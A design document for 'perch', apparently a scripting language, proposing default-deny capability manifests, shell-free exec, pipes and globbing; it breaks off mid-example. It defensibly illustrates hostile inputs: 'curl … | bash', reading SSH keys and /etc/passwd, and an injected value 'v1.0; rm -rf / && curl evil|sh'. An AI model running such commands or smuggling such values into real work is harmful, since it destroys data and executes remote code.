Sandboxed by design: zero ambient authority
The thesis. A perch program should start with zero access to anything outside itself. No shell. No filesystem. No network. No environment variables. No subprocesses. Every external resource a program touches MUST be declared in the file, and if it isn't declared, the op that needs it fails. No exceptions, no ambient authority, no "it happened to work because the host allowed it."
This is the object-capability / default-deny model applied to the whole language: the file is a sealed box; the only holes in the box are the ones the author cut on purpose, in writing.
Status (what ships today). The shell-free subprocess core of this design is now implemented and tested: the exec op (run a declared binary with structured argv; no shell, no metachar surface), the pipe … end block (wire stdout→stdin between exec stages with in-process pipes), the glob op (read-scoped wildcard expansion), and the pure line-toolbox (grep, reject, cut, head, tail, sort_lines, uniq_lines, count_lines). exec is gated by the same declared-bin check as shell. exec reads like a shell: bare flags/paths work unquoted (exec git log --oneline -10) and a quoted token keeps embedded spaces as one argv slot (exec git commit -m "fix the bug"). Still on the roadmap: the inline | / && / || operators (§3.3), with_exec (§3.4), named capability handles (§3.1), and flipping the default from ambient to deny (§8, §11). The per-primitive status table is in §3.5. The capy grammar-engine gaps this design originally hit have since been fixed upstream; see capy-limitations.md for what was resolved and what perch adopted.
1. Why
Today perch has the inverse default. A freshly written .perch can shell "curl … | bash", read ~/.ssh/id_rsa, write anywhere, and dial any host, unless the operator remembers to pass --no-shell --no-network --no-write … at launch. Security is opt-out, enforced by the person running the file, not declared by the person who wrote it.
That's backwards for the world perch is built for:
- AI-generated programs. When an agent writes the .perch, "the operator will remember the right flags" is not a control. The file must carry its own limits.
- Supply-chain. A recipe you curl-and-run should be able to do only what it says it does, by construction, not by you guessing the right sandbox flags.
- Auditability. "What can this touch?" should be answerable by reading the top of the file, and that answer should be complete and enforced, not advisory.
The requires block (shipped today) is the seed of this, but it's opt-in (only enforces when present) and partial (covers bins / hosts / env, not filesystem paths or the shell-capability gate itself). This doc describes finishing the job: making declaration mandatory and total.
2. What counts as an external resource
Every op is exactly one of two kinds.
Pure ops: always allowed, need no grant
Computation over values already in memory. No I/O, no clock, no entropy, no environment. These can never harm anything, so they're ungated:
trim · lower · upper · replace · split · join · contains · slice · format · length · pad_* · repeat · md5 · sha1 · sha256 (of a string) · crc32 · base64_* · hex_* · url_* · json_parse · json_get · json_stringify · csv_parse · regex_match · regex_replace · regex_find_all · version_extract · version_* compare · print / println (writing to the program's own stdout is not an external resource) · the control-flow blocks (if, for_each, match, try, parallel, timeout, retry).
Effectful ops: denied unless the matching capability is granted
| Capability | Ops it gates | Grant |
|---|---|---|
| shell | shell, shell_output, shell_detached | shell + bin "…" allowlist |
| read | read_file, stat, exists, is_file, is_dir, list_dir, walk_dir, file_size, file_mtime, sha256_file / md5_file (hashing a file) | read "PATH"… |
| write | mkdir, cp, mv, rm, touch, chmod, write_file, append_file, mktemp, mktemp_dir, gzip/ungzip/tar_*/zip_* (when writing) | write "PATH"… |
| net | http_get, http_post, http_put, http_delete, download, dns_lookup, port_check, get_ip | net + host "…" allowlist |
| env | get_env, set_env, unset_env, and ${UPPER_CASE} env fall-through | env "NAME"… |
| subprocess | pkg_install, kill_by_name, wasm_run (it can be granted host imports) | subprocess / declared per-op |
| cwd change | cd, with_cwd | covered by read/write on the target |
| clock / entropy / sysinfo | now, format_time, get_os, get_arch, hostname, user, pid | low-risk ambient; see §6. Likely allowed by default, but listed for completeness |
The principle: if the op's behavior depends on, or changes, the world outside this program's own memory and stdout, it needs a grant.
The subprocess trust boundary (honest scope)
perch gates which binaries run (the declared-bin check) and what environment they start with, but it cannot police what a binary does internally, because it can't parse an arbitrary tool's arguments. Be precise about what is and isn't enforced on a spawned docker / git:
- Environment: enforced (scrubbed). A subprocess does not inherit the host environment. It starts with only: a default operational set (PATH, HOME, TMPDIR, LANG, …: the OS plumbing tools need, provided for you so you needn't redeclare it), the vars the file declared via requires env "NAME", names the operator allowed via --env, and the program's own bindings + per-command env. An undeclared secret (AWS_SECRET_KEY, GITHUB_TOKEN) is dropped; the tool literally cannot read it. (Scrubbing is on whenever a requires block is present; a missing block is an empty manifest, so it's on by default.)
- Filesystem & network: NOT yet enforced for subprocesses. requires read / write / host bound perch's own ops (read_file, write_file, http_get). They do not confine a spawned binary: once git clone runs it can reach any host and write anywhere the OS user can. Closing this requires OS-level confinement (sandbox-exec on macOS, Landlock / bubblewrap on Linux), which is on the roadmap. Per-host network filtering for arbitrary binaries is fundamentally hard and may stay best-effort.
For hard isolation today, run perch itself inside a container/VM with the FS and network already limited; perch's manifest then describes intent and scrubs the env, and the container enforces the rest.
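The environment-scrubbing rule above can be modelled in a few lines. This is a minimal Python sketch, not perch's implementation: the function name `scrubbed_env`, the exact contents of the default operational set, and the choice that program bindings override host values are all assumptions made for illustration.

```python
# Assumed default operational set; the text lists PATH, HOME, TMPDIR, LANG and "…".
DEFAULT_OPERATIONAL = ("PATH", "HOME", "TMPDIR", "LANG")


def scrubbed_env(host_env, declared, operator_allowed, bindings):
    """Build the environment a subprocess starts with.

    host_env         -- the full host environment (a dict)
    declared         -- names from `requires env "NAME"`
    operator_allowed -- names the operator passed via --env
    bindings         -- the program's own bindings and per-command env
    """
    allowed = set(DEFAULT_OPERATIONAL) | set(declared) | set(operator_allowed)
    # Anything not explicitly allowed is dropped, so an undeclared secret
    # never reaches the child process.
    env = {k: v for k, v in host_env.items() if k in allowed}
    # Assumption: program-level values win over inherited host values.
    env.update(bindings)
    return env


host = {"PATH": "/usr/bin", "HOME": "/home/me",
        "AWS_SECRET_KEY": "s3cret", "KUBECONFIG": "/k"}
child = scrubbed_env(host, declared=["KUBECONFIG"], operator_allowed=[],
                     bindings={"GOOS": "linux"})
```

Here `child` contains PATH, HOME, KUBECONFIG and GOOS; AWS_SECRET_KEY is absent because nothing declared it.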
3. The target grammar
requires becomes the single, mandatory capability manifest. It already declares bins / hosts / env; we extend it with shell, read, write, net, subprocess, and per-path filesystem scopes:
    requires
      # Subprocess execution: off unless declared, AND every bin is allowlisted.
      # Pin a hash to nail down the exact build (read-only; no version probe).
      shell
        bin "git"
          hash "sha256:abc123…"
        end
        bin "docker"
      end
      # Filesystem: per-path, no ambient access to the rest of the disk.
      read  "./src" "./config" "${home}/.gitconfig"
      write "./build" "./dist" "${temp_dir}/myapp"
      # Network: off unless declared, AND every host is allowlisted.
      net
        host "api.github.com"
        host "*.amazonaws.com"
      end
      # Environment: per-name; nothing else is visible to the program.
      env "HOME" "KUBECONFIG"
      env "DEBUG" optional
      # Host shape (already supported).
      os   "linux" "darwin"
      arch "amd64" "arm64"
    end
Rules:
- No requires block means zero external authority. The program can compute (pure ops) and print, nothing else. A shell or read_file in such a file errors at parse/preflight time.
- read/write take path scopes. A path is allowed if it's inside one of the declared roots (prefix match on the canonicalized absolute path) or matches a declared glob. read_file "/etc/passwd" with only read "./src" declared → read_not_permitted.
- shell and net are two-level. Declaring shell permits subprocess at all; the nested bin lines say which. Same for net + host. Declaring shell with no bin lines is a no-op (you permitted the capability but allowlisted nothing), and --check warns.
- Pure ops are never mentioned. You never declare "I want to use upper."
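The path-scope rule (canonicalize, then prefix-match against the declared roots) can be sketched as follows. This is an illustrative Python model under stated assumptions: `is_permitted` and its `base` parameter are hypothetical names, glob-style grants are left out, and `os.path.realpath` stands in for whatever canonicalizer perch actually uses.

```python
import os


def is_permitted(path, roots, base="."):
    """Return True if `path` resolves inside one of the declared roots."""
    # realpath collapses ".." and follows symlinks that exist, so the
    # comparison below is made on canonical absolute paths.
    target = os.path.realpath(os.path.join(base, path))
    for root in roots:
        root_abs = os.path.realpath(os.path.join(base, root))
        # commonpath compares whole path components, which avoids the
        # string-prefix trap where "/x/src-evil" looks like it is under "/x/src".
        if os.path.commonpath([target, root_abs]) == root_abs:
            return True
    return False
```

With only `./src` declared, `is_permitted("/etc/passwd", ["./src"])` is False, which corresponds to the read_not_permitted case in the rules.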
3.1 Named external resources (capability handles)
Declaring a resource also binds it to a name. You then refer to the resource by that name everywhere in the file, and the reference is self-validating: the handle carries its own grant, so using it is proof you declared it. Rename the underlying path/host/version in one place and every call site follows.
Declaration: as NAME
Every requires entry gets a name. The name defaults to the resource's natural identifier (the bin name, the env-var name); as NAME overrides it:
    requires
      bin "git"                          # handle: git  (defaults to the bin name)
      bin "kubectl" >= "1.28.0" as kc    # handle: kc   (explicit alias)
      read  "./src" as src
      read  "${home}/.gitconfig" as gitconfig
      write "./dist" as dist
      net "api.github.com" as gh
      net "*.amazonaws.com" as aws
      env "KUBECONFIG" as kubeconfig
      env "DEBUG" optional as debug
    end
A handle is a file-scoped identifier (snake_case, no leading digit). It belongs to exactly one kind (bin, path, host, or env), and that kind determines where it may be used.
Reference: use the name, not the string
Each effectful op takes its primary resource as a handle in a known position, so the op kind + position tells the validator which namespace to resolve against. Arguments after the handle are argv tokens: bare words, exactly like typing at a shell:
    command build
      do
        git status                          # bin handle + bare argv; reads like the shell
        kc apply -f k8s/                    # (no shell, no string parsing, no metachar surface)
        conf = read_file src config.yaml    # path handle + bare subpath, joined + re-checked
        write_file dist out.txt "${conf}"   # path handle; value with content stays quoted/interpolated
        repo = http_get gh /repos/me/app    # host handle + bare path → https://api.github.com/...
        kube = get_env kubeconfig           # env handle
      end
    end
Argument tokens: when do you quote?
After a handle, each token is taken literally unless it needs otherwise. The rule is the shell's, not perch's:
| You write | perch sees |
|---|---|
| exec git status | argv ["status"]: bare word, literal |
| exec git log --oneline -10 | argv ["log","--oneline","-10"]: flags are just tokens |
| exec kc apply -f k8s/deploy.yaml | argv ["apply","-f","k8s/deploy.yaml"]: slashes/dots are fine bare |
| exec git commit -m "fix the bug" | argv ["commit","-m","fix the bug"]: quote only the token with a space |
| exec git checkout "${branch}" or exec git checkout ${branch} | argv ["checkout", <value of branch>]: ${…} interpolates a binding |
So: bare for plain words and flags, quotes only when a token contains whitespace, ${…} to splice a value binding. You never quote status, -f, or k8s/, same as you wouldn't in a terminal.
Semantics:
- exec HANDLE token token …: HANDLE is a bin handle; the tokens are argv passed straight to the binary. No shell, no word-splitting of the tokens, so bin_not_declared / metachar injection can't happen; the bin is structural and each token is one argv slot.
- read_file HANDLE subpath: HANDLE is a path handle naming a read root. The bare subpath is joined and re-canonicalized; if the result escapes the root (via .., a symlink, etc.) it's read_not_permitted. read_file HANDLE alone reads the root if it's a file.
- http_get HANDLE path: HANDLE is a host handle. The bare path is appended to the declared host (scheme defaults to https; declare net "http://…" to allow plain).
- get_env HANDLE: HANDLE is an env handle resolving to the declared variable.
Why this is safe even though it looks like a shell. A shell word-splits and re-globs the whole line, which is where injection lives. Here, each token is captured by the parser as exactly one argv element and handed to exec untouched: exec git commit -m "${msg}" puts the entire ${msg} value in one argv slot even if it contains spaces, semicolons, or $(…). It reads like a shell but has none of the shell's re-interpretation.
Validation: the reference is the proof
Every handle reference is checked statically by perch --check and at runtime by the capability gate:
| Situation | Result |
|---|---|
| Handle used but never declared in requires | unknown_capability (static error; --check fails) |
| Handle used in the wrong position (a path handle where a bin is expected) | capability_kind_mismatch (static error) |
| Path-handle subpath escapes the declared root | read_not_permitted / write_not_permitted (runtime) |
| Everything resolves | runs; the gate is satisfied because the handle is a grant |
Because the handle can only exist if it was declared, referencing it is the validation; there's no separate "is this allowed?" check to forget. Unknown handle → the file doesn't compile.
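The two static checks in the table can be modelled with a small lookup. This is a hedged Python sketch, not perch's validator: `CheckError`, `EXPECTED_KIND`, and `check_reference` are hypothetical names, and the op-to-kind mapping covers only the ops used as examples in this section.

```python
class CheckError(Exception):
    """A static validation failure carrying one of the documented error codes."""

    def __init__(self, code, handle):
        super().__init__(f"{code}: {handle}")
        self.code = code


# Which handle kind each op expects in its handle position (assumed subset).
EXPECTED_KIND = {
    "exec": "bin",
    "read_file": "path",
    "write_file": "path",
    "http_get": "host",
    "get_env": "env",
}


def check_reference(op, handle, declared):
    """`declared` maps handle name -> kind, as collected from the requires block."""
    if handle not in declared:
        raise CheckError("unknown_capability", handle)
    if declared[handle] != EXPECTED_KIND[op]:
        raise CheckError("capability_kind_mismatch", handle)


declared = {"git": "bin", "src": "path", "gh": "host", "kubeconfig": "env"}
check_reference("exec", "git", declared)      # passes silently
check_reference("read_file", "src", declared)  # passes silently
```

The runtime half (a subpath escaping its root) is not covered here; it needs the canonicalized path check rather than a name lookup.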
Why this is better than bare strings
- One source of truth. The host api.github.com, the path ./src, the kubectl version floor: each is written once. Bump it in the requires block; every call site updates automatically.
- Refactor-safe. Move a service to a new host: change net "…" as gh and nothing else. Call sites say gh, not the literal.
- No string-sniffing. exec git status is unambiguously a declared bin + argv. The validator never has to parse a shell string to discover what bin ran, eliminating both the static-analysis guesswork and the injection surface.
- Reads as intent. http_get gh "/repos" says "talk to the GitHub handle," not "dial whatever this string resolves to." Reviewers see the capability, not the plumbing.
- Diff-friendly for audits. A PR that adds a capability adds a named line to requires; the reviewable unit is "this file now has a handle aws," not "grep the body for new hosts."
Disambiguation from value bindings
perch already has value bindings (url = …, ${url}) and the bare-ident arg form (print url). Capability handles are a separate namespace, resolved by op-position: the first arg of exec / read_file / http_get / get_env is a handle, not a value binding. Where ambiguity would arise, the value form stays available with the string syntax (http_get "${url}"), and the handle form is the bare ident (http_get gh "/path"). --check flags a bare ident in a handle position that matches no declared handle.
Honest caveats
- This needs the capability model from §2 to §4 to exist first; handles are sugar over the grants, not a replacement for them.
- Handles are file-scoped. Imported files (import "./lib.perch") would need either their own requires or an explicit re-export rule. TBD, tracked with the import design.
- A path handle is still a prefix/glob grant, not a chroot (§10): the subpath re-check reduces the exposure, but a hardened canonicalizer is what closes ../ and symlink escapes.
3.2 Removing shell entirely: only declared binaries
The strongest version of this model deletes the shell op altogether. There is no sh -c, no shell string, no --no-shell-metachars flag, no allowlist-parsing of a command line. The only way to run a subprocess is to exec a declared binary with structured argv:
    # Today
    shell "docker ps -q -f name=^web$ | wc -l"
    # Sandboxed-by-design, shell removed (ships today). Bare flags/filters
    # need no quotes; a quoted token keeps embedded spaces as one slot.
    n =
      pipe
        docker ps -q -f name=^web$
        wc -l
      end
A subprocess is always exec <declared-bin-handle> <token> <token> …. Each token is one argv slot; nothing is ever handed to a shell to re-interpret.
Pros
- The single largest attack surface disappears, structurally, not by policy. Every HIGH finding --scan raises today is a shell-string problem: catch → shell ${proxy_args}, unvalidated ${var} in a shell command, curl … | bash. With no shell op there is nothing to inject into. --no-shell-metachars, checkShell, first-token allowlist parsing, the metachar denylist: all of it becomes dead code you can delete.
- Subprocess analysis becomes total and trivial. "Which binaries can this file run?" has an exact, static answer: the set of declared bin handles. No more "we can't tell what this shell string runs because it's interpolated." --scan / --check / simulate go from heuristic to complete.
- The capability model has no second-class hole. Today shell is a megacapability: grant it and the named bin can pipe into anything. With exec-only, "subprocess" is exactly the declared bins and their declared argv shapes; there's no "...and also a shell that can run arbitrary pipelines."
- True cross-platform. exec git status behaves identically on macOS / Linux / Windows. shell "a && b" depends on sh vs bash vs cmd.exe existing and agreeing on &&, quoting, and glob rules: the exact "works on my machine" problem perch exists to kill.
- It forces composition into perch, where it's inspectable. A pipeline expressed as perch ops (capture → transform → next) is visible to the audit log, the span tree, and the validator. A pipeline buried in a shell string is opaque to all three.
Cons / what you lose
- Pipes. a | b | c is the thing people will miss most. Without a shell you compose by capturing output and feeding the next op: more verbose, and genuinely awkward for long pipelines until perch grows first-class plumbing (see What perch must add below).
- Globbing. rm *.tmp relies on the shell expanding the glob. Exec-only means *.tmp reaches the program literally; you'd walk_dir + filter + rm each, unless perch ships a glob op.
- && / || / ; one-liners. Replaced by perch's own sequencing (ops run in order), if, and try. Mostly a wash, but mkdir x && cd x becomes two lines.
- Env-assignment prefixes. GOOS=linux go build is shell syntax. Becomes with_env "GOOS=linux" … exec go build … end: more structured, more typing.
- Heredocs / process substitution / shell builtins. cat <<EOF, <(…), ${VAR:-default}: gone. Each needs a perch equivalent (write_file for heredocs, etc.).
- Migration cost is real and large. Every existing .perch and recipe that uses shell must be rewritten. The current recipes are docker-heavy and lean on pipes (docker ps … | …); converting them is non-trivial.
- The escape-hatch tail. Occasionally you genuinely need a shell: a gnarly one-off pipeline, or a vendor tool whose only documented invocation is a shell line. "perch literally cannot do what bash can here" will frustrate some users for that tail of cases.
What perch must add first to make this viable
Removing shell is only reasonable once the common shell idioms have first-class, shell-free replacements:
- A pipe block that wires stdout → stdin between declared bins without a shell (the pipe … end form shown in the example above).
- A glob op: files = glob "*.tmp" (scoped to a declared read root) so wildcard removal/iteration has a structured form.
- with_env (already exists) covers env prefixes; ops run in sequence already covers ;; if/try cover && / ||.
- Output capture + the string/JSON/regex ops (already exist) cover most of what a pipeline's middle stages did with grep/awk/sed.
The honest escape hatch
For the irreducible tail that truly needs a shell pipeline: don't put it in an inline string. Put it in a file, declare it, and pin it.
    requires
      shell                                   # the capability, if we keep a gated form
        bin "./scripts/pipeline.sh" hash "sha256:…"
      end
    end
    command report
      do
        ./scripts/pipeline.sh "${date}"       # the shell complexity is a named, hash-pinned artifact
      end
    end
Now the shell lives in a reviewable, hash-pinned .sh file that the manifest declares, not in an ambient inline string. The "everything external is declared and pinned" invariant holds even for the shell escape. This is the middle path between "keep inline shell" and "remove it with no recourse."
Verdict (for discussion)
Three positions, weakest → strongest:
1. Keep shell, gate it (shell { bin … } capability, §3). Lowest migration cost; preserves pipes; but the metachar/injection surface and the "shell is a megacapability" hole remain.
2. Remove inline shell, allow exec-of-declared-shell-script (the escape hatch above). Eliminates the inline-injection surface; pipelines that truly need a shell become declared, hash-pinned files; cost is rewriting recipes + building pipe / glob.
3. Remove shell and any shell entirely: only exec of declared non-shell bins, pipelines only via perch's pipe. Maximum guarantee ("no shell anywhere, ever"); highest cost; the escape-hatch tail has no recourse but to ship a non-shell helper binary.
Position 2 is the recommended target: it delivers nearly all the security value of 3 (no inline shell string, nothing to inject into) while leaving a declared, pinned path for the genuinely-needs-a-shell tail. 3 is the purist end state worth reaching only after pipe/glob have proven they cover the real recipes without a shell. 1 is the pragmatic first step that ships without a recipe rewrite.
3.3 Bringing back && / || / ; and KEY=val, without a shell
Removing shell doesn't mean giving up the ergonomics people associate with it. The two most-missed shell features, conditional chaining (&& / || / ;) and per-command env prefixes (GOOS=linux …), can come back as perch grammar around exec. The difference from a shell is the whole point: perch parses these as structure; they never become a string an external shell re-interprets.
Chaining operators are perch operators, not shell metachars
    git pull && go build && go test      # each clause is a structured exec
    which gh || brew install gh          # RHS runs only if LHS failed
    stop_old ; start_new                 # run both regardless
These parse into a chain of exec clauses joined by perch-level operators. Each clause is still exec <declared-bin> <tokens>; there is no sh -c, no word-splitting of a line, no glob. The operators are evaluated by the interpreter on the exit code of each clause:
| Operator | Meaning |
|---|---|
| A && B | run A; run B only if A exited 0. Short-circuits left→right. |
| A \|\| B | run A; run B only if A exited non-zero. |
| A ; B | run A, then B, regardless of A's exit. (Same as two lines; offered for one-liners.) |
Semantics worth pinning down:
- A bare exec that exits non-zero raises (perch's normal error model: aborts the command unless caught by try). Inside a && / || chain, the operator consumes the exit code instead: exec a && exec b does not raise if a fails; it just skips b. The chain raises only if its last actually-run clause exits non-zero. (If you want "abort on any failure," that's the default sequential form: separate lines.)
- In an if condition the chain is boolean. if exec test -f x && exec grep -q foo x ... end is true iff the whole chain succeeded; no abort, the exit codes drive the branch.
- Operators can only be literal source tokens. They are recognized by the parser between exec clauses; an interpolated ${x} can never become an && (see the keystone below). You cannot construct an operator at runtime.
This is sugar over control flow perch already has (if exit_code == 0, sequential ops, try), surfaced in a form that reads like the shell line it replaces, but with each command structurally bound to a declared bin.
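The operator table can be read as a left-to-right fold over exit codes. The Python sketch below models that reading; it is an assumption-laden illustration, not the interpreter: `run_chain` is a hypothetical name, each clause is stood in for by a zero-argument callable returning an exit code, and the sketch only returns the final status, leaving the decision to raise with the caller.

```python
def run_chain(first, rest):
    """Evaluate a chain of clauses joined by &&, || and ;.

    first -- zero-arg callable returning an exit code
    rest  -- list of (operator, callable) pairs
    Returns the exit code of the last clause that actually ran.
    """
    status = first()
    for op, clause in rest:
        if op not in ("&&", "||", ";"):
            raise ValueError(f"unknown operator: {op}")
        if op == "&&" and status != 0:
            continue  # left side failed: skip this clause
        if op == "||" and status == 0:
            continue  # left side succeeded: skip this clause
        status = clause()  # ";" always runs; "&&"/"||" run when not skipped
    return status


ran = []


def clause(name, code):
    """Build a fake exec clause that records its name and returns `code`."""
    def run():
        ran.append(name)
        return code
    return run


# a fails, so b is skipped under &&:
result = run_chain(clause("a", 1), [("&&", clause("b", 0))])
```

After this call `ran` holds only "a", matching the rule that a failed left side skips the right side of &&.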
Per-exec env prefixes
Leading KEY=val tokens on an exec line (the shell idiom GOOS=linux go build) are parsed as a localized environment overlay for that single exec: sugar for wrapping it in with_env. Rules:
- The bin is the first non-assignment token (go in that example), and it must be a declared handle; GOOS=linux does not make GOOS the bin.
- Each KEY=val is one structured assignment; the value may interpolate (GOOS=${target}) but interpolation fills only that value slot.
- The overlay is scoped to the single exec and restored after; it does not leak to later ops (unlike export / set_env, which are deliberate process-lifetime changes).
The keystone: parse first, interpolate second, never the reverse
This is the single most important rule that makes all of the above safe, and it's the exact inversion of how a shell works:
A ${var} can only become the content of a slot that already exists in the already-parsed structure: one argv token, or one KEY=val value. It can never introduce a new token, a new KEY=val, an operator (&& / || / ;), a redirect, a glob, or a second command.
Shells do interpolate-then-parse: they splice $var into the command line and then lex/parse the result, so a value containing ; rm -rf / becomes new syntax. perch does parse-then-interpolate: the structure (bin handle, argv slots, env slots, chain operators) is fixed by the parser before any ${var} is resolved, and resolution only fills leaf slots.
Concretely, take exec git commit -m "${msg}" where msg holds v1.0; rm -rf / && curl evil|sh. git receives exactly one -m argument whose value is the literal string v1.0; rm -rf / && curl evil|sh. The ;, &&, | are data inside one argv slot: not operators, not new commands. There is no parse step after interpolation for them to influence. The same value in a shell (git commit -m "$msg" without perfect quoting) is a catastrophe; here it is simply a weird commit message.
This is why && / || / env-prefixes can be added back without reopening the injection hole: they exist only as literal structure the author typed, fixed before any untrusted value is substituted.
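Parse-then-interpolate is easy to demonstrate outside perch. The Python sketch below is a model under assumptions: `parse_exec` and `interpolate` are hypothetical names, and the standard-library `shlex.split` stands in for perch's own lexer only because it happens to keep a quoted token as one slot. The point it illustrates is the ordering: slots are fixed first, then values are substituted inside them with no second split.

```python
import re
import shlex

_SLOT = re.compile(r"\$\{(\w+)\}")


def parse_exec(line):
    """Split one exec line into (bin, argv slots) BEFORE any substitution."""
    # posix mode keeps "fix the bug" as a single token and strips the quotes.
    tokens = shlex.split(line, posix=True)
    if len(tokens) < 2 or tokens[0] != "exec":
        raise ValueError("expected: exec BIN token...")
    return tokens[1], tokens[2:]


def interpolate(slots, bindings):
    """Fill ${name} inside each existing slot; the result is never re-split."""
    # A function replacement inserts the value verbatim (no escape processing).
    return [_SLOT.sub(lambda m: bindings[m.group(1)], s) for s in slots]


binary, slots = parse_exec('exec git commit -m "${msg}"')
argv = interpolate(slots, {"msg": "v1.0; rm -rf / && curl evil|sh"})
```

The hostile value ends up as one element of `argv`; passing `[binary, *argv]` to a process-spawning API that takes a list (rather than a command string) preserves that one-slot guarantee.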
3.4 with_exec BIN … end: a bin-scoped block
When you call the same binary several times in a row (docker compose up, docker compose exec …, docker ps), repeating exec docker on every line is noise. with_exec scopes a declared bin handle so each line inside the block is an invocation of it: a with_exec docker … end block whose body lines are compose up, compose exec …, and ps is exactly equivalent to the three lines exec docker compose up, exec docker compose exec …, and exec docker ps.
This is the same family as with_env / with_cwd: a context block that factors a shared setting out of the body. Here the shared setting is which bin runs.
Rules
- The block head names a declared bin handle (docker must be in requires). It's declared once, at the block head, reinforcing "always a defined bin," never a string.
- Each bare line is the argv passed to that bin, same token rules as inline exec (§3.1: bare words literal, quote only for spaces, ${…} fills one slot).
- Lines run top-to-bottom; a failing line raises (perch's normal abort-on-error). That gives you &&-style "stop on first failure" sequencing for free, which is what a multi-step session with one tool almost always wants. To continue past a failure, use || exec … on that line or wrap it in try.
- An inner line may start with its own exec to call a different bin; it overrides the scoped bin for that line only.
- Composes with the other context blocks. Wrap in with_cwd / with_env to add a shared directory or environment.
How it relates to the other forms
| Form | Use when |
|---|---|
| exec BIN args | a one-off call |
| exec a && exec b (§3.3) | two-or-three commands with conditional/exit-code logic on one line |
| with_exec BIN … end | several calls to the same bin in sequence (abort on first failure) |
| pipe … end (§3.2) | wiring one command's stdout into another's stdin (no shell) |
Honest notes
- It's pure sugar: it lowers to a sequence of exec BIN … ops, so it adds nothing to the capability model and changes no security property. The bin is still a declared handle; tokens are still structured argv; interpolation still fills leaf slots only (§3.3 keystone).
- It only helps when you're calling one bin repeatedly. Mixed-bin sequences read better as plain exec lines.
- Branching inside the block uses perch's normal if/try; with_exec doesn't introduce its own control flow.
3.5 The shell toolbox, perch-native
The pitch: keep the syntax people already know (|, &&, ||, <), but perch parses every command and manages every process itself. A pipeline isn't handed to sh -c; perch lexes it into a list of exec <declared-bin> <argv> stages and wires them with in-process os.Pipes. Same shape on the page, none of the shell's word-splitting / globbing / re-interpretation. This section shows how each shell idiom is expressed with the current op catalog (marked exists) plus the few primitives this design adds (marked proposed).
A note on legend: (exists) = shippable today with the current ops; (proposed) = a small new op/operator this design introduces.
Pipe: stdout → stdin wiring (the pipe block ships; the inline | operator is proposed)
| is a perch operator (like &&), parsed between exec clauses. perch opens an io.Pipe between stage N's stdout and stage N+1's stdin; no shell.
    # bash: docker ps -q | wc -l
    n = exec docker ps -q | exec wc -l           # inline, two stages
    # bash: kubectl get pods -o json | jq -r '.items[].metadata.name' | sort
    names =
      pipe
        kubectl get pods -o json
        jq -r ".items[].metadata.name"
        sort
      end                                        # block form for 3+ stages
- Every stage is still exec <declared-bin> <structured-argv>. The | never reaches a shell; it's process plumbing perch owns.
- The chain's value is the last stage's stdout (capturable with let). Its exit status follows §3.3 rules (a failing stage raises unless consumed).
- A pipeline of declared bins is fully analyzable: --scan lists every bin in the chain; there's no opaque shell string.
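The "process plumbing perch owns" idea can be shown with ordinary OS pipes and no shell. The following is a minimal Python sketch, not perch's code: `run_pipe` is a hypothetical helper, the `declared` set stands in for the declared-bin check, and Python's `subprocess` module is used in place of the interpreter's own pipe handling.

```python
import subprocess
import sys


def run_pipe(stages, declared):
    """Run each argv list as its own process, wiring stdout -> stdin. No shell.

    stages   -- list of argv lists, e.g. [["docker", "ps", "-q"], ["wc", "-l"]]
    declared -- set of binaries the manifest allows (stand-in for the bin check)
    Returns (stdout of the last stage as text, list of exit codes).
    """
    for argv in stages:
        if argv[0] not in declared:
            raise PermissionError(f"bin_not_declared: {argv[0]}")
    procs = []
    prev_out = None
    for argv in stages:
        stdin = prev_out if prev_out is not None else subprocess.DEVNULL
        p = subprocess.Popen(argv, stdin=stdin, stdout=subprocess.PIPE)
        if prev_out is not None:
            # The child holds its own copy; closing ours lets the upstream
            # stage get SIGPIPE if the downstream stage exits early.
            prev_out.close()
        prev_out = p.stdout
        procs.append(p)
    out, _ = procs[-1].communicate()
    codes = [p.wait() for p in procs]
    return out.decode(), codes


# Two stages built from the current Python interpreter so the sketch runs anywhere.
produce = [sys.executable, "-c", "print('a'); print('b'); print('c')"]
count = [sys.executable, "-c",
         "import sys; print(len(sys.stdin.read().splitlines()))"]
text, codes = run_pipe([produce, count], declared={sys.executable})
```

Each stage is an argv list handed straight to the OS, so a `|` inside an argument would be plain data, and the set of binaries in the pipeline is known before anything runs.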
stdin from a value (proposed: | accepts a string on its left)
The left side of | may be a string value instead of an exec; perch feeds it to the right stage's stdin. This replaces echo … | and heredocs:
    # bash: echo "$json" | jq '.name'
    name = "${json}" | exec jq -r ".name"
    # bash: jq '.x' <<< "$data"
    x = "${data}" | exec jq ".x"
"${json}" is one stdin stream, never re-parsed. The §3.3 keystone holds: an interpolated value can only ever be data on a stream, never new commands.
Glob: expand wildcards (exists via walk_dir; the glob op ships as sugar)
The shell expands *.tmp before the command sees it. perch never does ambient globbing; you ask for matches explicitly, scoped to a declared read root.
    # today (exists): walk + filter
    all = walk_dir src
    for_each all f
      if regex_match "\\.tmp$" f
        rm f                          # within a declared write root
      end
    end
    # glob sugar: one op
    tmp = glob "src/**/*.tmp"         # list, scoped to read root `src`
    for_each tmp f
      rm f
    end
glob is sugar over walk_dir + a pattern match; it never escapes the declared root (the §10 canonicalizer applies).
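A root-scoped glob of this kind can be sketched with the standard library. This Python model makes several assumptions: `scoped_glob` is a hypothetical name, `pathlib` pattern syntax stands in for perch's, and containment is checked by resolving each match and confirming it still sits under the root.

```python
from pathlib import Path


def scoped_glob(root, pattern):
    """Expand `pattern` under `root`, dropping matches that resolve outside it."""
    root_abs = Path(root).resolve()
    matches = []
    for p in root_abs.glob(pattern):
        real = p.resolve()
        # A symlink inside the root may point elsewhere; keep only paths
        # whose canonical location is still inside the root.
        if real == root_abs or root_abs in real.parents:
            matches.append(real)
    return sorted(matches)
```

Called as `scoped_glob("src", "**/*.tmp")`, it returns the matching files beneath `src` and nothing else, which is the explicit, scoped expansion the text describes in contrast to ambient shell globbing.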
Stream transforms: replace grep / sed / awk / cut / head / sort / uniq / wc
Work on captured output as lines. Most of this exists today with string/regex ops; a thin line-oriented layer makes it ergonomic.
| Shell | perch (exists) | perch (line toolbox, ships) |
|---|---|---|
| … \| grep PAT | for_each (split out "\n") l + if regex_match PAT l | grep PAT out → matching lines |
| … \| grep -v PAT | same with if not regex_match | reject PAT out |
| … \| sed 's/a/b/g' | regex_replace "a" "b" out | n/a (already one op) |
| … \| awk '{print $2}' | split line " " then index _1 | cut 2 out (whitespace columns) |
| … \| cut -d, -f1 | split line "," then index _0 | cut 1 out sep="," |
| … \| head -n 5 | slice lines 0 5 | head 5 out |
| … \| tail -n 5 | slice lines -5 | tail 5 out |
| … \| sort | n/a | sort_lines out |
| … \| uniq | n/a | uniq_lines out |
| … \| wc -l | length (split out "\n") | count_lines out |
    # bash: git log --oneline | grep fix | head -5
